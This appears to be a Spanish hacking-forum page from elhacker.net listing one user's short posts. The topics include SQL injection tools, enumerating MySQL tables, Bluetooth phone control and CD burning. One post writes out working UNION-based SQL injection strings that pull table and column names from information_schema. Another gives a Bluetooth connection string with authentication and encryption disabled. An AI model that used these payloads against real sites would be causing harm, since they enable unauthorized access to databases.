elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: [+] SQL-PwnZ v1.1 | By Login-Root en: 18 Septiembre 2008, 22:36 pm
Gracias lo probe y va muy bien...

Ahorro muuuuuuuucho tiempo gracias a este script!


Saludos
2  Seguridad Informática / Nivel Web / Re: SQL inj en: 10 Septiembre 2008, 15:37 pm

Snap90210 estoy en la misma... con MySql consigo injecciones facilmente, pero con MS SQL Server estoy perdido de como arrancar...

Tubiste algun avance??? a leer sobre Microsoft SQL no queda otra


saludos
3  Seguridad Informática / Nivel Web / Re: Obtener tablas con SQL Injection (mysql 4) en: 7 Septiembre 2008, 00:31 am

para averiguar nombre la tabla:
+union+all+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+where+table_schema+=+database()

para averiguar columnas sabiendo el nombre de la tabla:
+union+all+select+1,2,column_name,4,5,6,7,8+from+information_schema.columns+where+table_name+=+char(NOMBRE DE TABLA)

Si los valores no salen a la primera tendras que ir delimitando un poco la busqueda.


Espero que haya servido un poco...


Saludos
4  Seguridad Informática / Hacking / Re: Todas las revistas de HackxCrack en PDF!! (no escaneadas) en: 8 Junio 2008, 16:07 pm


Que nostalgia que me da ver esto nuevamente!!!

Lastima que dejaron de editarlas...



Gracias por el aporte muchachos
5  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Re: Nokia N95 Internet via Bluetooth en: 5 Junio 2008, 13:56 pm


Fijate porque en modo Ad-Host puede que puedas compartir internet de tu pc al telefono...

Chequea la zona Wifi.


Saludos
6  Comunicaciones / Hacking Mobile / Re: Programa Bt Info (Controlar Cell Via Bluetooth) en: 18 Julio 2007, 02:46 am


btspp://XXXXXXXXXXXX:X;authenticate=false;encrypt=false;ma ster=false

Donde XXXXXXXXXXXX:X es el numero que sale al conectarnos. Solo falta poner el nombre que se nos ocurra para recordar de quien era...

-----------------------------------------------------------------------------------------------

Me podrias explicar mas de las XXXXXXXXXXX; me conecto me sale un numero, hexadecimal sino me equivoco, pero al agregarlo con ese formato luego no me puedo conectar.
La ultima X luego del ":" que significa???

Gracias
7  Informática / Software / Grabar CD a baja velocidad 1x o 2x con grabadoras actuales en: 6 Noviembre 2006, 14:47 pm

Alguien me da una mano, no soy de preguntar si antes leer... pero hasta ahora no encontre nada al respecto.




Como Grabar CD-r a la menor velocidad que sea posible, ya sea de datos o audio.


Tengo entendido que mientras mas "lento" se grabe un disco, mayor compatibilidad y durabilidad tiene el mismo.


Desde ya muchas Gracias.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines